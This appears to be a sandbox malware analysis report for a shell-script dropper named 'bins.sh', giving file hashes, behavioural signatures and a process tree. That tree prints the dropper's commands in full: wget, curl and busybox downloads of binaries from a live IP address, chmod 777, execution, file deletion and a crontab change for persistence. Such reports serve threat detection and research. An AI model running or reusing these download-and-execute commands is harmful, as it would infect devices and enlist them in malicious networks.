Analysis
-
max time kernel
149s -
max time network
182s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
24-11-2024 08:42
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
00e6a838ebbbb8d44e8bde3072d71948
-
SHA1
18ba68e4dc8af71f08dc42dc68055a295059cee5
-
SHA256
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be
-
SHA512
a8395ad7797c42c32a6f073151b82aea873fa6c842131b0899ee95e667e0038619feddfc236a5b12c834fb6a032f31a0cd79e3f931da05269dda866616ebdc14
-
SSDEEP
192:uTWqEbzElT+8s8V5fmlJRGmGxFNCiOn8s8V5alJRGm6xFNCi/WqEbzcq:unT+8s8V5fmlJRGmrn8s8V5alJRGmf
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Contacts a large (1970) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 774 chmod 781 chmod 683 chmod 727 chmod 759 chmod -
Executes dropped EXE 5 IoCs
ioc pid Process /tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN 685 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN /tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T 729 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T /tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK 760 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK /tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM 775 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM /tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk 782 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk -
Renames itself 1 IoCs
pid Process 783 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.IVLK3m crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 5 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/797/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/811/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/893/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/1050/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/1056/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/851/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/903/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/951/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/966/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/1049/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/828/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/905/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/956/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/979/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/1028/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/1059/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/1009/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/1012/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/284/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/594/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/813/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/863/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/872/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/943/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/998/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/21/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/814/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/841/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/866/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/992/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/1010/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/13/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/43/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/108/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/945/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/1042/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/794/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/835/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/1060/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/12/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/205/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/834/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/836/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/870/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/927/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/1023/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/7/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/791/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/846/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/859/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/899/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/982/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/816/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/880/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/923/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/940/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/947/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/891/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/793/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/804/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/861/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/935/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk File opened for reading /proc/839/cmdline tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk -
Writes file to tmp directory 15 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM busybox File opened for modification /tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk curl File opened for modification /tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk busybox File opened for modification /tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN wget File opened for modification /tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK curl File opened for modification /tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM wget File opened for modification /tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM curl File opened for modification /tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN busybox File opened for modification /tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T curl File opened for modification /tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T busybox File opened for modification /tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk wget File opened for modification /tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T wget File opened for modification /tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK wget File opened for modification /tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK busybox File opened for modification /tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN curl
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:645
-
/bin/rm/bin/rm bins.sh2⤵PID:647
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Writes file to tmp directory
PID:649
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:673
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Writes file to tmp directory
PID:677
-
-
/bin/chmodchmod 777 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- File and Directory Permissions Modification
PID:683
-
-
/tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN./nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Executes dropped EXE
PID:685
-
-
/bin/rmrm nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:687
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Writes file to tmp directory
PID:689
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:703
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Writes file to tmp directory
PID:719
-
-
/bin/chmodchmod 777 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T./0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Executes dropped EXE
PID:729
-
-
/bin/rmrm 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:731
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Writes file to tmp directory
PID:732
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Writes file to tmp directory
PID:751
-
-
/bin/chmodchmod 777 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK./PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:763
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Writes file to tmp directory
PID:764
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:772
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Writes file to tmp directory
PID:773
-
-
/bin/chmodchmod 777 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- File and Directory Permissions Modification
PID:774
-
-
/tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM./Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Executes dropped EXE
PID:775
-
-
/bin/rmrm Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:777
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Writes file to tmp directory
PID:778
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Writes file to tmp directory
PID:780
-
-
/bin/chmodchmod 777 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk./tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:782 -
/bin/shsh -c "crontab -l"3⤵PID:784
-
/usr/bin/crontabcrontab -l4⤵PID:785
-
-
-
/bin/shsh -c "crontab -"3⤵PID:786
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:787
-
-
-
-
/bin/rmrm tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:789
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:792
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
98KB
MD55141342d0df8699fa32a6b066a0c592e
SHA18157673225bd5182f16215e2aa823a25ca2d4fbc
SHA25654302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d
SHA512d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801
-
Filesize
111KB
MD5ca897a38f23ec23521ce0b1b83f8422d
SHA1b8d2ab335346aba9a72bae0fe3533aca1ab7b66a
SHA256043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832
SHA51210d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb
-
Filesize
107KB
MD5eb9c3a0de91fcf16ba17cb24608df68c
SHA109d95a7d70d5e115d103be51edff7c498d272fac
SHA256dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47
SHA5129e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27
-
Filesize
177KB
MD5786d75a158fe731feca3880f436082c0
SHA179ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA2565fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA5127984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
-
Filesize
210B
MD50d301b753d10dac8c7eea1495ecef9e9
SHA1b637da18514d24fc0bba3ea450ad2f01bba0d805
SHA2567c6c9e3db29586f2ce46505b73c94857b9d6ead5e7a7c12a87701b58dd35a57a
SHA512ffa35c3f49acefe4e53500d3ef74c08100001ebb356383e612f92c122c2157c43610ec6dad8a1a0db09ea7ff72b153ff3bb1d5b8b6e913841f31577229191683